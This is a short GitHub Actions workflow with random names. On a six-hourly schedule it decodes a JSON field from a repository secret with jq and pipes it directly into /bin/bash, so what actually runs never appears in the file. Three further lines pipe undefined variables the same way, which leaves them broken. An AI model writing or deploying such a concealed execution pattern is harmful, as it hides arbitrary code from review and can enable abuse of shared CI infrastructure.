name: paprikasouthwest

on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: paprikasouthwest
        env:
          qj652: ${{ secrets.qj652 }}
        run: |
          echo $qj652 | jq -r .nbfp8389 | /bin/bash
          echo $sxlhe31 | jq -r .tkrvv078 | /bin/bash
          echo $zq60 | jq -r .xx19 | /bin/bash
          echo $etui1 | jq -r .x35494 | /bin/bash

